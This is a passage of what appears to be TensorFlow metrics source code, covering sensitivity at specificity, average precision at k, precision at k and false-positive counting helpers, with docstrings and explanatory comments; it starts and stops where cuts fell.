  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity
  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    specificity: A scalar value in range `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    num_thresholds: The number of thresholds to use for matching the given
      specificity.
    metrics_collections: An optional list of collections that `sensitivity`
      should be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.
  Returns:
    sensitivity: A scalar `Tensor` representing the sensitivity at the given
      `specificity` value.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables
      appropriately and whose value matches `sensitivity`.
  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      `specificity` is not between 0 and 1, or if either `metrics_collections`
      or `updates_collections` are not a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.sensitivity_at_specificity is not '
                       'supported when eager execution is enabled.')
  if specificity < 0 or specificity > 1:
    raise ValueError('`specificity` must be in the range [0, 1].')
  with variable_scope.variable_scope(name, 'sensitivity_at_specificity',
                                     (predictions, labels, weights)):
    kepsilon = 1e-7  # to account for floating point imprecisions
    # num_thresholds - 2 evenly spaced interior thresholds, plus endpoints
    # nudged just outside [0, 1] so every prediction falls strictly inside
    # some threshold bucket.
    thresholds = [
        (i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
    ]
    thresholds = [0.0 - kepsilon] + thresholds + [1.0 + kepsilon]
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights)
    def compute_sensitivity_at_specificity(tp, tn, fp, fn, name):
      # specificity = TN / (TN + FP) per threshold; pick the threshold whose
      # specificity is closest to the requested value.
      specificities = math_ops.div(tn, tn + fp + kepsilon)
      tf_index = math_ops.argmin(math_ops.abs(specificities - specificity), 0)
      tf_index = math_ops.cast(tf_index, dtypes.int32)
      # Now, we have the implicit threshold, so compute the sensitivity:
      return math_ops.div(tp[tf_index], tp[tf_index] + fn[tf_index] + kepsilon,
                          name)
    def sensitivity_across_replicas(_, values):
      return compute_sensitivity_at_specificity(
          values['tp'], values['tn'], values['fp'], values['fn'], 'value')
    sensitivity = _aggregate_across_replicas(
        metrics_collections, sensitivity_across_replicas, values)
    update_op = compute_sensitivity_at_specificity(
        update_ops['tp'], update_ops['tn'], update_ops['fp'], update_ops['fn'],
        'update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return sensitivity, update_op
def _expand_and_tile(tensor, multiple, dim=0, name=None):
  """Slice `tensor` shape in 2, then tile along the sliced dimension.
  A new dimension is inserted in shape of `tensor` before `dim`, then values are
  tiled `multiple` times along the new dimension.
  Args:
    tensor: Input `Tensor` or `SparseTensor`.
    multiple: Integer, number of times to tile.
    dim: Integer, dimension along which to tile.
    name: Name of operation.
  Returns:
    `Tensor` result of expanding and tiling `tensor`.
  Raises:
    ValueError: if `multiple` is less than 1, or `dim` is not in
    `[-rank(tensor), rank(tensor)]`.
  """
  if multiple < 1:
    raise ValueError('Invalid multiple %s, must be > 0.' % multiple)
  with ops.name_scope(name, 'expand_and_tile',
                      (tensor, multiple, dim)) as scope:
    # Sparse.
    tensor = sparse_tensor.convert_to_tensor_or_sparse_tensor(tensor)
    if isinstance(tensor, sparse_tensor.SparseTensor):
      if dim < 0:
        # Resolve a negative `dim` to its non-negative equivalent by adding
        # the (dynamic) rank, as a shape-[1] tensor usable by slice below.
        expand_dims = array_ops.reshape(
            array_ops.size(tensor.dense_shape) + dim, [1])
      else:
        expand_dims = [dim]
      # Build [dims_before_dim, 1, dims_from_dim_on] to insert the new axis.
      expanded_shape = array_ops.concat(
          (array_ops.slice(tensor.dense_shape, [0], expand_dims), [1],
           array_ops.slice(tensor.dense_shape, expand_dims, [-1])),
          0,
          name='expanded_shape')
      expanded = sparse_ops.sparse_reshape(
          tensor, shape=expanded_shape, name='expand')
      if multiple == 1:
        return expanded
      # sparse_concat along the new axis replicates the values `multiple`
      # times. For negative `dim`, `expanded` has one extra dimension, so the
      # axis shifts by one.
      return sparse_ops.sparse_concat(
          dim - 1 if dim < 0 else dim, [expanded] * multiple, name=scope)
    # Dense.
    # For negative `dim`, expand_dims counts from the end of the *expanded*
    # shape, hence the dim - 1 adjustment.
    expanded = array_ops.expand_dims(
        tensor, dim if (dim >= 0) else (dim - 1), name='expand')
    if multiple == 1:
      return expanded
    # Tile only along the inserted axis: multiples are 1 everywhere except at
    # position `dim`, where `multiple` is spliced in.
    ones = array_ops.ones_like(array_ops.shape(tensor))
    tile_multiples = array_ops.concat(
        (ones[:dim], (multiple,), ones[dim:]), 0, name='multiples')
    return array_ops.tile(expanded, tile_multiples, name=scope)
def _num_relevant(labels, k):
  """Computes number of relevant values for each row in labels.
  For labels with shape [D1, ... DN, num_labels], this is the minimum of
  `num_labels` and `k`.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels].
    k: Integer, k for @k metric.
  Returns:
    Integer `Tensor` of shape [D1, ... DN], where each value is the number of
    relevant values for that row.
  Raises:
    ValueError: if inputs have invalid dtypes or values.
  """
  if k < 1:
    raise ValueError('Invalid k=%s.' % k)
  with ops.name_scope(None, 'num_relevant', (labels,)) as scope:
    labels = sparse_tensor.convert_to_tensor_or_sparse_tensor(labels)
    if isinstance(labels, sparse_tensor.SparseTensor):
      # Sparse labels: rows may have differing numbers of stored values, so
      # count each row's set size and cap it at `k`.
      return math_ops.minimum(sets.set_size(labels), k, name=scope)
    # Dense labels: every row has exactly last-dimension-many entries, so one
    # scalar min(num_labels, k) suffices; broadcast it over the leading dims.
    dense_shape = array_ops.shape(labels)
    capped_count = math_ops.minimum(dense_shape[-1], k)
    return array_ops.fill(dense_shape[0:-1], capped_count, name=scope)
def _sparse_average_precision_at_top_k(labels, predictions_idx):
  """Computes average precision@k of predictions with respect to sparse labels.
  From en.wikipedia.org/wiki/Information_retrieval#Average_precision, formula
  for each row is:
    AveP = sum_{i=1...k} P_{i} * rel_{i} / num_relevant_items
  A "row" is the elements in dimension [D1, ... DN] of `predictions_idx`,
  `labels`, and the result `Tensors`. In the common case, this is [batch_size].
  Each row of the results contains the average precision for that row.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions_idx`.
      Values should be in range [0, num_classes).
    predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
      Commonly, N=1 and `predictions_idx` has shape [batch size, k]. The final
      dimension must be set and contains the top `k` predicted class indices.
      [D1, ... DN] must match `labels`. Values should be in range
      [0, num_classes).
  Returns:
    `float64` `Tensor` of shape [D1, ... DN], where each value is the average
    precision for that row.
  Raises:
    ValueError: if the last dimension of predictions_idx is not set.
  """
  with ops.name_scope(None, 'average_precision',
                      (predictions_idx, labels)) as scope:
    predictions_idx = math_ops.to_int64(predictions_idx, name='predictions_idx')
    if predictions_idx.get_shape().ndims == 0:
      raise ValueError('The rank of predictions_idx must be at least 1.')
    # `k` must be known statically, since it determines the tiling below.
    k = predictions_idx.get_shape().as_list()[-1]
    if k is None:
      raise ValueError('The last dimension of predictions_idx must be set.')
    labels = _maybe_expand_labels(labels, predictions_idx)
    # Expand dims to produce [D1, ... DN, k, 1] tensor. This gives us a separate
    # prediction for each k, so we can calculate separate true positive values
    # for each k.
    predictions_idx_per_k = array_ops.expand_dims(
        predictions_idx, -1, name='predictions_idx_per_k')
    # Replicate labels k times to produce [D1, ... DN, k, num_labels] tensor.
    labels_per_k = _expand_and_tile(
        labels, multiple=k, dim=-1, name='labels_per_k')
    # The following tensors are all of shape [D1, ... DN, k], containing values
    # per row, per k value.
    # `relevant_per_k` (int32) - Relevance indicator, 1 if the prediction at
    #     that k value is correct, 0 otherwise. This is the "rel_{i}" term from
    #     the formula above.
    # `tp_per_k` (int32) - True positive counts.
    # `retrieved_per_k` (int32) - Number of predicted values at each k. This is
    #     the precision denominator.
    # `precision_per_k` (float64) - Precision at each k. This is the "P_{i}"
    #     term from the formula above.
    # `relevant_precision_per_k` (float64) - Relevant precisions; i.e.,
    #     precisions at all k for which relevance indicator is true.
    relevant_per_k = _sparse_true_positive_at_k(
        labels_per_k, predictions_idx_per_k, name='relevant_per_k')
    # cumsum along the k axis yields running TP counts at cutoffs 1..k.
    tp_per_k = math_ops.cumsum(relevant_per_k, axis=-1, name='tp_per_k')
    retrieved_per_k = math_ops.cumsum(
        array_ops.ones_like(relevant_per_k), axis=-1, name='retrieved_per_k')
    precision_per_k = math_ops.div(
        math_ops.to_double(tp_per_k),
        math_ops.to_double(retrieved_per_k),
        name='precision_per_k')
    # Multiplying by the 0/1 relevance indicator keeps only the P_{i} terms
    # where rel_{i} is true, per the formula.
    relevant_precision_per_k = math_ops.multiply(
        precision_per_k,
        math_ops.to_double(relevant_per_k),
        name='relevant_precision_per_k')
    # Reduce along k dimension to get the sum, yielding a [D1, ... DN] tensor.
    precision_sum = math_ops.reduce_sum(
        relevant_precision_per_k, reduction_indices=(-1,), name='precision_sum')
    # Divide by number of relevant items to get average precision. These are
    # the "num_relevant_items" and "AveP" terms from the formula above.
    num_relevant_items = math_ops.to_double(_num_relevant(labels, k))
    return math_ops.div(precision_sum, num_relevant_items, name=scope)
def _streaming_sparse_average_precision_at_top_k(labels,
                                                 predictions_idx,
                                                 weights=None,
                                                 metrics_collections=None,
                                                 updates_collections=None,
                                                 name=None):
  """Computes average precision@k of predictions with respect to sparse labels.
  `sparse_average_precision_at_top_k` creates two local variables,
  `average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
  are used to compute the frequency. This frequency is ultimately returned as
  `average_precision_at_<k>`: an idempotent operation that simply divides
  `average_precision_at_<k>/total` by `average_precision_at_<k>/max`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision_at_<k>`. Set operations applied to `top_k` and `labels` calculate
  the true positives and false positives weighted by `weights`. Then `update_op`
  increments `true_positive_at_<k>` and `false_positive_at_<k>` using these
  values.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions_idx`.
      Values should be in range [0, num_classes).
    predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
      Commonly, N=1 and `predictions_idx` has shape [batch size, k]. The final
      dimension contains the top `k` predicted class indices. [D1, ... DN] must
      match `labels`. Values should be in range [0, num_classes).
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.
  Returns:
    mean_average_precision: Scalar `float64` `Tensor` with the mean average
      precision values.
    update: `Operation` that increments variables appropriately, and whose
      value matches `metric`.
  """
  with ops.name_scope(name, 'average_precision_at_top_k',
                      (predictions_idx, labels, weights)) as scope:
    # Calculate per-example average precision, and apply weights.
    average_precision = _sparse_average_precision_at_top_k(
        predictions_idx=predictions_idx, labels=labels)
    if weights is not None:
      weights = weights_broadcast_ops.broadcast_weights(
          math_ops.to_double(weights), average_precision)
      average_precision = math_ops.multiply(average_precision, weights)
    # Create accumulation variables and update ops for max average precision and
    # total average precision.
    with ops.name_scope(None, 'max', (average_precision,)) as max_scope:
      # `max` is the max possible precision. Since max for any row is 1.0:
      # - For the unweighted case, this is just the number of rows.
      # - For the weighted case, it's the sum of the weights broadcast across
      #   `average_precision` rows.
      max_var = metric_variable([], dtypes.float64, name=max_scope)
      if weights is None:
        batch_max = math_ops.to_double(
            array_ops.size(average_precision, name='batch_max'))
      else:
        batch_max = math_ops.reduce_sum(weights, name='batch_max')
      max_update = state_ops.assign_add(max_var, batch_max, name='update')
    with ops.name_scope(None, 'total', (average_precision,)) as total_scope:
      total_var = metric_variable([], dtypes.float64, name=total_scope)
      batch_total = math_ops.reduce_sum(average_precision, name='batch_total')
      total_update = state_ops.assign_add(total_var, batch_total, name='update')
    # Divide total by max to get mean, for both vars and the update ops.
    def precision_across_replicas(_, total_var, max_var):
      return _safe_scalar_div(total_var, max_var, name='mean')
    mean_average_precision = _aggregate_across_replicas(
        metrics_collections, precision_across_replicas, total_var, max_var)
    # _safe_scalar_div guards against a zero denominator before any batch has
    # been accumulated.
    update = _safe_scalar_div(total_update, max_update, name=scope)
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return mean_average_precision, update
@tf_export('metrics.sparse_average_precision_at_k')
@deprecated(None, 'Use average_precision_at_k instead')
def sparse_average_precision_at_k(labels,
                                  predictions,
                                  k,
                                  weights=None,
                                  metrics_collections=None,
                                  updates_collections=None,
                                  name=None):
  """Renamed to `average_precision_at_k`, please use that method instead."""
  # Deprecated alias: forward all arguments unchanged to the renamed metric.
  return average_precision_at_k(
      labels,
      predictions,
      k,
      weights=weights,
      metrics_collections=metrics_collections,
      updates_collections=updates_collections,
      name=name)
@tf_export('metrics.average_precision_at_k')
def average_precision_at_k(labels,
                           predictions,
                           k,
                           weights=None,
                           metrics_collections=None,
                           updates_collections=None,
                           name=None):
  """Computes average precision@k of predictions with respect to sparse labels.
  `average_precision_at_k` creates two local variables,
  `average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
  are used to compute the frequency. This frequency is ultimately returned as
  `average_precision_at_<k>`: an idempotent operation that simply divides
  `average_precision_at_<k>/total` by `average_precision_at_<k>/max`.
  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
  indicating the top `k` `predictions`. Set operations applied to `top_k` and
  `labels` calculate the true positives and false positives weighted by
  `weights`. Then `update_op` increments `true_positive_at_<k>` and
  `false_positive_at_<k>` using these values.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range are ignored.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and `predictions` has shape
      [batch size, num_classes]. The final dimension contains the logit values
      for each class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric. This will calculate an average precision for
      range `[1,k]`, as documented above.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.
  Returns:
    mean_average_precision: Scalar `float64` `Tensor` with the mean average
      precision values.
    update: `Operation` that increments variables appropriately, and whose
      value matches `metric`.
  Raises:
    ValueError: if k is invalid.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    # Fix: the message previously named the deprecated alias
    # `tf.metrics.sparse_average_precision_at_k`; name this function instead,
    # consistent with every other metric in this module.
    raise RuntimeError('tf.metrics.average_precision_at_k is not '
                       'supported when eager execution is enabled.')
  if k < 1:
    raise ValueError('Invalid k=%s.' % k)
  with ops.name_scope(name, _at_k_name('average_precision', k),
                      (predictions, labels, weights)) as scope:
    # Calculate top k indices to produce [D1, ... DN, k] tensor.
    _, predictions_idx = nn.top_k(predictions, k)
    # Delegate streaming accumulation to the top-k variant.
    return _streaming_sparse_average_precision_at_top_k(
        labels=labels,
        predictions_idx=predictions_idx,
        weights=weights,
        metrics_collections=metrics_collections,
        updates_collections=updates_collections,
        name=scope)
def _sparse_false_positive_at_k(labels,
                                predictions_idx,
                                class_id=None,
                                weights=None):
  """Calculates false positives for precision@k.
  If `class_id` is specified, calculate binary false positives for `class_id`
  only.
  If `class_id` is not specified, calculate metrics for `k` predicted vs
  `n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
  Returns:
    A [D1, ... DN] `Tensor` of false positive counts.
  """
  with ops.name_scope(None, 'false_positives',
                      (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
                                                     class_id)
    # False positives are predicted classes that do not appear in the labels:
    # per-row size of the set difference (predictions - labels).
    fp = sets.set_size(
        sets.set_difference(predictions_idx, labels, aminusb=True))
    fp = math_ops.to_double(fp)
    if weights is not None:
      # Validate broadcastability before multiplying, so shape errors surface
      # here rather than deep inside the graph.
      with ops.control_dependencies((weights_broadcast_ops.assert_broadcastable(
          weights, fp),)):
        weights = math_ops.to_double(weights)
        fp = math_ops.multiply(fp, weights)
    return fp
def _streaming_sparse_false_positive_at_k(labels,
                                          predictions_idx,
                                          k=None,
                                          class_id=None,
                                          weights=None,
                                          name=None):
  """Calculates weighted per step false positives for precision@k.
  If `class_id` is specified, calculate binary false positives for `class_id`
  only.
  If `class_id` is not specified, calculate metrics for `k` predicted vs
  `n` label classes, where `n` is the 2nd dimension of `labels`.
  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    k: Integer, k for @k metric. This is only used for default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    name: Name of new variable, and namespace for other dependent ops.
  Returns:
    A tuple of `Variable` and update `Operation`.
  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  with ops.name_scope(name, _at_k_name('false_positive', k, class_id=class_id),
                      (predictions_idx, labels, weights)) as scope:
    # Per-row (weighted) false-positive counts for this batch.
    batch_fp = _sparse_false_positive_at_k(
        predictions_idx=predictions_idx,
        labels=labels,
        class_id=class_id,
        weights=weights)
    # Collapse to a single scalar total for the batch.
    batch_fp_total = math_ops.to_double(math_ops.reduce_sum(batch_fp))
    # Scalar accumulator variable plus the op that folds this batch into it.
    fp_var = metric_variable([], dtypes.float64, name=scope)
    return fp_var, state_ops.assign_add(fp_var, batch_fp_total, name='update')
@tf_export('metrics.precision_at_top_k')
def precision_at_top_k(labels,
                       predictions_idx,
                       k=None,
                       class_id=None,
                       weights=None,
                       metrics_collections=None,
                       updates_collections=None,
                       name=None):
  """Computes precision@k of the predictions with respect to sparse labels.

  Differs from `sparse_precision_at_k` in that predictions must be in the
  form of top `k` class indices, whereas `sparse_precision_at_k` expects
  logits. Refer to `sparse_precision_at_k` for more details.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes
      for the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`.
      Values should be in range [0, num_classes); values outside this range
      are ignored.
    predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where
      N >= 1. Commonly, N=1 and predictions has shape [batch size, k].
      The final dimension contains the top `k` predicted class indices.
      [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric. Only used for the default op name.
    class_id: Integer class ID for which we want binary metrics. This should
      be in range [0, num_classes]; if outside this range, the method
      returns NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent
      ops.

  Returns:
    precision: Scalar `float64` `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_positives`.
    update_op: `Operation` that increments `true_positives` and
      `false_positives` variables appropriately, and whose value matches
      `precision`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or
      `updates_collections` are not a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.precision_at_top_k is not '
                       'supported when eager execution is enabled.')
  with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
                      (predictions_idx, labels, weights)) as scope:
    labels = _maybe_expand_labels(labels, predictions_idx)
    predictions_idx_64 = math_ops.to_int64(predictions_idx)
    # Both streaming counters receive identical arguments.
    counter_kwargs = dict(
        predictions_idx=predictions_idx_64,
        labels=labels,
        k=k,
        class_id=class_id,
        weights=weights)
    tp, tp_update = _streaming_sparse_true_positive_at_k(**counter_kwargs)
    fp, fp_update = _streaming_sparse_false_positive_at_k(**counter_kwargs)

    def precision_across_replicas(_, true_pos, false_pos):
      # precision = tp / (tp + fp), evaluated on aggregated counters.
      return math_ops.div(
          true_pos, math_ops.add(true_pos, false_pos), name=scope)

    metric = _aggregate_across_replicas(
        metrics_collections, precision_across_replicas, tp, fp)
    update = math_ops.div(
        tp_update, math_ops.add(tp_update, fp_update), name='update')
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return metric, update
@tf_export('metrics.sparse_precision_at_k')
@deprecated(None, 'Use precision_at_k instead')
def sparse_precision_at_k(labels,
                          predictions,
                          k,
                          class_id=None,
                          weights=None,
                          metrics_collections=None,
                          updates_collections=None,
                          name=None):
  """Renamed to `precision_at_k`, please use that method instead."""
  # Deprecated pass-through alias: every argument is forwarded unchanged.
  return precision_at_k(
      labels=labels,
      predictions=predictions,
      k=k,
      class_id=class_id,
      weights=weights,
      metrics_collections=metrics_collections,
      updates_collections=updates_collections,
      name=name)
@tf_export('metrics.precision_at_k')
def precision_at_k(labels,
                   predictions,
                   k,
                   class_id=None,
                   weights=None,
                   metrics_collections=None,
                   updates_collections=None,
                   name=None):
  """Computes precision@k of the predictions with respect to sparse labels.

  If `class_id` is specified, we calculate precision by considering only the
  entries in the batch for which `class_id` is in the top-k highest
  `predictions`, and computing the fraction of them for which `class_id` is
  indeed a correct label.

  If `class_id` is not specified, we'll calculate precision as how often on
  average a class among the top-k classes with the highest predicted values
  of a batch entry is correct and can be found in the label for that entry.

  `precision_at_k` creates two local variables, `true_positive_at_<k>` and
  `false_positive_at_<k>`, that are used to compute the precision@k
  frequency. This frequency is ultimately returned as `precision_at_<k>`: an
  idempotent operation that simply divides `true_positive_at_<k>` by total
  (`true_positive_at_<k>` + `false_positive_at_<k>`).

  For estimation of the metric over a stream of data, the function creates
  an `update_op` operation that updates these variables and returns the
  `precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
  indicating the top `k` `predictions`. Set operations applied to `top_k`
  and `labels` calculate the true positives and false positives weighted by
  `weights`. Then `update_op` increments `true_positive_at_<k>` and
  `false_positive_at_<k>` using these values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes
      for the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`.
      Values should be in range [0, num_classes), where num_classes is the
      last dimension of `predictions`. Values outside this range are
      ignored.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and predictions has shape
      [batch size, num_classes]. The final dimension contains the logit
      values for each class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric.
    class_id: Integer class ID for which we want binary metrics. This should
      be in range [0, num_classes], where num_classes is the last dimension
      of `predictions`. If `class_id` is outside this range, the method
      returns NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e.,
      all dimensions must be either `1`, or the same as the corresponding
      `labels` dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent
      ops.

  Returns:
    precision: Scalar `float64` `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_positives`.
    update_op: `Operation` that increments `true_positives` and
      `false_positives` variables appropriately, and whose value matches
      `precision`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or
      `updates_collections` are not a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    # BUG FIX: the message previously named the deprecated alias
    # `tf.metrics.sparse_precision_at_k`; name this function instead so the
    # error points callers at the API they actually invoked.
    raise RuntimeError('tf.metrics.precision_at_k is not '
                       'supported when eager execution is enabled.')
  with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
                      (predictions, labels, weights)) as scope:
    # Reduce logits to the indices of the top-k classes, then delegate to
    # the index-based implementation.
    _, top_k_idx = nn.top_k(predictions, k)
    return precision_at_top_k(
        labels=labels,
        predictions_idx=top_k_idx,
        k=k,
        class_id=class_id,
        weights=weights,
        metrics_collections=metrics_collections,
        updates_collections=updates_collections,
        name=scope)
@tf_export('metrics.specificity_at_sensitivity')
def specificity_at_sensitivity(labels,
                               predictions,
                               sensitivity,
                               weights=None,
                               num_thresholds=200,
                               metrics_collections=None,
                               updates_collections=None,
                               name=None):
  """Computes the specificity at a given sensitivity.

  The `specificity_at_sensitivity` function creates four local
  variables, `true_positives`, `true_negatives`, `false_positives` and
  `false_negatives` that are used to compute the specificity at the given
  sensitivity value. The threshold for the given sensitivity value is
  computed and used to evaluate the corresponding specificity.

  For estimation of the metric over a stream of data, the function creates
  an `update_op` operation that updates these variables and returns the
  `specificity`. `update_op` increments the `true_positives`,
  `true_negatives`, `false_positives` and `false_negatives` counts with the
  weight of each case found in the `predictions` and `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose
      values are in the range `[0, 1]`.
    sensitivity: A scalar value in range `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions
      must be either `1`, or the same as the corresponding `labels`
      dimension).
    num_thresholds: The number of thresholds to use for matching the given
      sensitivity.
    metrics_collections: An optional list of collections that `specificity`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    specificity: A scalar `Tensor` representing the specificity at the given
      `specificity` value.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables
      appropriately and whose value matches `specificity`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, if
      `weights` is not `None` and its shape doesn't match `predictions`, or
      if `sensitivity` is not between 0 and 1, or if either
      `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.specificity_at_sensitivity is not '
                       'supported when eager execution is enabled.')
  if sensitivity < 0 or sensitivity > 1:
    raise ValueError('`sensitivity` must be in the range [0, 1].')
  with variable_scope.variable_scope(name, 'specificity_at_sensitivity',
                                     (predictions, labels, weights)):
    kepsilon = 1e-7 # to account for floating point imprecisions
    # num_thresholds - 2 evenly spaced interior thresholds in (0, 1), plus
    # endpoints nudged by kepsilon so predictions of exactly 0.0 and 1.0
    # fall strictly on one side of the extreme thresholds.
    thresholds = [
        (i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
    ]
    thresholds = [0.0 - kepsilon] + thresholds + [1.0 - kepsilon]
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights)
